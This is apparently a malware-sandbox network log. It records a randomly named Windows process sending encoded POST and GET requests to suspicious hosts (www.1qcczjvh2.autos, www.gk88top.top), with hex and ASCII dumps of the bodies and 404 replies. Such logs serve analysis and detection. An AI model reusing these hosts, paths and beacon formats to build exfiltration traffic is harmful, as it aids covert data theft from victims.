                                                                                                            Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                                                                                                            Dec 6, 2024 09:34:09.608510017 CET1236INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                                                                                                            Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                                                                                                            Dec 6, 2024 09:34:09.608726978 CET1236INData Raw: 36 52 76 59 75 2b 41 65 52 44 4e 67 75 7a 63 55 59 2f 4f 4a 76 2f 64 45 52 5a 32 35 75 42 41 72 6b 6d 6c 6e 45 61 36 66 47 39 46 53 4c 44 41 55 6c 66 4b 2b 39 58 72 66 50 44 41 78 70 4d 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e
                                                                                                            Data Ascii: 6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllD
                                                                                                            Dec 6, 2024 09:34:09.608738899 CET1169INData Raw: 30 65 69 6d 74 39 35 73 45 63 6d 51 4c 75 43 53 41 4b 5a 43 6e 69 76 30 4e 52 6e 76 68 53 49 38 62 64 67 35 32 67 67 59 4a 51 49 6f 70 74 79 30 34 64 68 4a 67 63 6a 49 75 59 36 6e 59 66 66 31 79 75 6b 6e 38 4d 78 6a 55 56 36 50 36 58 39 32 67 49
                                                                                                            Data Ascii: 0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw4rs2E3Ue8tCr+AAGoEei3FcQ9i3xxR0WQC7CTxe27qzEY9S9BwHYAXwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5T
                                                                                                            Dec 6, 2024 09:34:09.608844042 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                                                                                                            Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.449999129.226.153.85805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:10.739825010 CET10784OUTPOST /pfw9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 10305
                                                                                                            Origin: http://www.1qcczjvh2.autos
                                                                                                            Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 6e 79 77 4d 6f 42 34 48 53 47 6f 43 34 4e 66 55 44 4b 78 34 65 69 7a 73 6f 52 4f 38 46 31 53 5a 6b 49 49 4a 4a 39 4d 62 69 4a 48 6d 31 4b 56 6d 31 42 51 35 72 32 66 76 6b 6d 47 47 39 32 47 68 35 32 4a 6a 70 77 51 75 4f 65 35 6f 6b 65 71 68 49 42 47 67 33 58 6f 47 4e 4f 76 47 4d 55 42 7a 67 42 6a 41 4e 4a 56 79 38 70 73 43 32 41 4a 6b 6b 6c 59 42 4a 61 46 2b 6d 56 72 48 39 4a 35 31 49 6c 51 61 2b 5a 72 6e 51 34 65 49 63 71 5a 66 6e 65 38 32 55 73 5a 6e 62 5a 33 55 51 46 72 71 4d 72 79 6c 73 68 58 68 42 69 54 65 4f 34 70 64 64 34 4c 35 64 55 31 67 33 77 4e 4e 4f 45 62 49 4e 46 66 4b 49 6b 79 79 36 63 7a 53 54 37 72 49 50 73 4e 41 6e 62 50 63 47 6e 50 41 4a 44 76 33 33 58 48 4c 52 52 52 52 73 53 6e 33 4f 70 56 6c 41 59 36 69 6d 4a 55 6f 32 2b 66 51 35 51 65 4b 6e 53 2b 6e 4c 39 39 54 4a 32 30 62 6a 58 73 47 4c 54 77 44 58 53 5a 48 30 32 46 44 76 6a 68 [TRUNCATED]
                                                                                                            Data Ascii: yhXxt4VH=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXnywMoB4HSGoC4NfUDKx4eizsoRO8F1SZkIIJJ9MbiJHm1KVm1BQ5r2fvkmGG92Gh52JjpwQuOe5okeqhIBGg3XoGNOvGMUBzgBjANJVy8psC2AJkklYBJaF+mVrH9J51IlQa+ZrnQ4eIcqZfne82UsZnbZ3UQFrqMrylshXhBiTeO4pdd4L5dU1g3wNNOEbINFfKIkyy6czST7rIPsNAnbPcGnPAJDv33XHLRRRRsSn3OpVlAY6imJUo2+fQ5QeKnS+nL99TJ20bjXsGLTwDXSZH02FDvjhXWn/hzXbgIg5tWCIIClGQfufBQxu+NKdXokOpaBT55W6aZp7H+fkFaYd5xkkbhe/2UeeLOsXj9Ddu4sMcf6ZWfmO/KPf/KWOxNLYbiH2wOTY1uQKVGlqwlJXbR47Hjmj2ptGRjY9uZJQvZ9Vw4dqRY6V9Y2YRKdNXlGTuUIX6ivXLA6O5jCvhNNbFpyIkaFXSFQSAXud0UPekG1UDrQgthDb4bV69aCLKpibOIS30Vuq5ujrqcPbK8/kOyHmwbyxfYyMYnWXnxDUGlQaaJy7x9f2X8Qc32Ohj2XunfrkXrzbGwrBlPSdilp48JLmQ1dgsKpBwXrKrrXbP/0Dl6/vhyHA4pArINUmnXFkRKapZpvm/heYtT7KjeGysUsUowFowQNgxBcGVD5fheGrXynVe1655CpGJF8eOwEYAOWq1AYSRnoNgOmQS+dgOZIV1n31yTbMcQC5Rguc0YAMICYvAYpvA4d8+AoyZavt78NuFtofE1tjA9+kufzgeH0EiSinSb6IoJnykIt2uvpbuF+gcJSG9TSzNnSyzKeFeZV84zQcT74eodKHhp/nnAmt25S9nEHimyT1zvaHBu++KP/jVShBhdR2/Dz3myXLZsBzACiWSfdCe6Y/sf4CX4xxwj86A3fqFMQzRfPZjcX08BeJkSh/aMhYCZXmNc [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.450005129.226.153.85805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:13.391891956 CET412OUTGET /pfw9/?yhXxt4VH=45l5W170mEENNSUnzK4z1bTcnj7w1ape/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZPlZ4cFkLSrPaRO4QE3Rmb2BtP350cPbvkbU=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.1qcczjvh2.autos
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:34:14.928694010 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: Tengine
                                                                                                            Date: Fri, 06 Dec 2024 08:34:14 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Content-Length: 58288
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: "67344967-e3b0"
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                            Dec 6, 2024 09:34:14.928724051 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                                                                            Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                                                                            Dec 6, 2024 09:34:14.928736925 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                                                                            Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                                                                            Dec 6, 2024 09:34:14.928797007 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                                                                            Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                                                                            Dec 6, 2024 09:34:14.928853989 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                                                                                                            Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                                                                                                            Dec 6, 2024 09:34:14.928865910 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
                                                                                                            Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                                                                                                            Dec 6, 2024 09:34:14.928880930 CET1236INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                                                                                                            Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                                                                                                            Dec 6, 2024 09:34:14.929037094 CET1236INData Raw: 36 52 76 59 75 2b 41 65 52 44 4e 67 75 7a 63 55 59 2f 4f 4a 76 2f 64 45 52 5a 32 35 75 42 41 72 6b 6d 6c 6e 45 61 36 66 47 39 46 53 4c 44 41 55 6c 66 4b 2b 39 58 72 66 50 44 41 78 70 4d 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e
                                                                                                            Data Ascii: 6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllD
                                                                                                            Dec 6, 2024 09:34:14.929049969 CET1169INData Raw: 30 65 69 6d 74 39 35 73 45 63 6d 51 4c 75 43 53 41 4b 5a 43 6e 69 76 30 4e 52 6e 76 68 53 49 38 62 64 67 35 32 67 67 59 4a 51 49 6f 70 74 79 30 34 64 68 4a 67 63 6a 49 75 59 36 6e 59 66 66 31 79 75 6b 6e 38 4d 78 6a 55 56 36 50 36 58 39 32 67 49
                                                                                                            Data Ascii: 0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw4rs2E3Ue8tCr+AAGoEei3FcQ9i3xxR0WQC7CTxe27qzEY9S9BwHYAXwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5T
                                                                                                            Dec 6, 2024 09:34:14.929198027 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                                                                                                            Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj
                                                                                                            Dec 6, 2024 09:34:15.048871994 CET1236INData Raw: 77 56 67 72 42 57 30 66 77 32 4d 4d 47 44 55 59 39 59 30 68 72 31 57 39 36 38 68 31 52 44 68 52 33 73 2f 72 2b 59 6a 58 5a 34 36 70 47 50 6d 64 48 76 55 72 6e 77 4c 48 32 55 76 6d 7a 6f 38 52 2f 6c 78 33 65 72 2f 4e 43 79 44 59 69 67 39 4d 42 6d
                                                                                                            Data Ascii: wVgrBW0fw2MMGDUY9Y0hr1W968h1RDhR3s/r+YjXZ46pGPmdHvUrnwLH2Uvmzo8R/lx3er/NCyDYig9MBmCzmIejuNRhvd1gWCLkLO8iMYnW4evOfVXiQtrNDwA4FHcl69Uk0AAAIABJREFUcPygav4l90Ye3VJ7Ytsv2mp4YTgcy9eqAGBVnmSz2yvydqkZbgVTNH+vd/ZWQi0AoLHtuoLwLoA0yA7vNOQ3fSvkOJpvAMyBXOJ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.450021104.21.7.187805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:20.892209053 CET670OUTPOST /4gxa/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.gk88top.top
                                                                                                            Referer: http://www.gk88top.top/4gxa/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 58 67 31 68 6e 79 77 32 64 78 44 61 7a 70 36 78 4b 56 4d 4a 44 59 50 33 45 37 5a 35 44 36 34 4b 47 52 39 42 5a 44 31 38 59 33 4a 6e 72 4f 7a 65 7a 57 38 49 30 76 59 54 42 73 49 69 2f 72 4a 42 59 30 4c 34 63 6b 77 49 36 76 66 6c 59 63 56 56 42 30 64 73 6f 31 44 6a 32 53 38 47 77 53 6a 33 32 31 57 42 4f 4c 69 32 39 71 36 71 65 46 76 79 2f 70 32 62 51 4b 54 4c 7a 49 32 2b 42 38 75 53 6a 67 69 64 30 54 51 77 74 6a 43 67 5a 33 51 6e 69 5a 71 52 59 4d 4a 6c 54 76 66 32 70 6e 32 4e 41 32 31 56 64 51 42 69 6a 44 48 38 70 56 73 58 4f 6a 6a 2f 4b 2f 4d 47 78 66 49 4b 74 76 73 34 41 3d 3d
                                                                                                            Data Ascii: yhXxt4VH=FXg1hnyw2dxDazp6xKVMJDYP3E7Z5D64KGR9BZD18Y3JnrOzezW8I0vYTBsIi/rJBY0L4ckwI6vflYcVVB0dso1Dj2S8GwSj321WBOLi29q6qeFvy/p2bQKTLzI2+B8uSjgid0TQwtjCgZ3QniZqRYMJlTvf2pn2NA21VdQBijDH8pVsXOjj/K/MGxfIKtvs4A==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.450027104.21.7.187805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:34:23.552150965 CET690OUTPOST /4gxa/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.gk88top.top
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 225
                                                                                                            Origin: http://www.gk88top.top
                                                                                                            Referer: http://www.gk88top.top/4gxa/
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Data Raw: 79 68 58 78 74 34 56 48 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 6e 4a 6e 4b 65 7a 66 79 57 38 4c 30 76 59 59 68 73 48 6d 2f 72 4f 42 5a 49 44 34 64 59 77 49 36 72 66 6c 61 45 56 55 32 67 53 76 59 30 6c 72 57 53 79 43 77 53 6a 33 32 31 57 42 4f 66 59 32 39 79 36 72 75 31 76 79 61 64 35 59 51 4b 51 43 54 49 32 36 42 38 71 53 6a 67 63 64 31 2f 36 77 76 62 43 67 59 48 51 6b 7a 59 59 59 59 4d 4c 34 44 75 4f 39 61 32 79 49 79 66 75 55 64 38 57 6c 51 6e 6a 77 50 59 32 47 2f 43 30 74 4b 62 2f 62 32 57 38 48 75 53 6c 6a 44 55 6c 41 75 34 76 37 52 34 58 63 6b 6e 54 45 30 78 75 4c 6c 67 3d
                                                                                                            Data Ascii: yhXxt4VH=FXg1hnyw2dxDICZ6zo9MBDYM9k7Zwj68KGd9BY3l8unJnKezfyW8L0vYYhsHm/rOBZID4dYwI6rflaEVU2gSvY0lrWSyCwSj321WBOfY29y6ru1vyad5YQKQCTI26B8qSjgcd1/6wvbCgYHQkzYYYYML4DuO9a2yIyfuUd8WlQnjwPY2G/C0tKb/b2W8HuSljDUlAu4v7R4XcknTE0xuLlg=
                                                                                                            Dec 6, 2024 09:34:25.183080912 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Fri, 06 Dec 2024 08:34:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmOCNn8sTefxI4Gfk%2BRHsnYOaHFyC557m1c7u5N6D0itD91%2FuH0v7%2Bm%2BtsvNRCkDqFrxPmAxHCSUZknzxeIjJcoLZch4y1oGj8JNZdBacAUhgZ5Hdox3b%2Fd%2FLRrNbCvuQ5U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8edaefc6f8d6434a-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 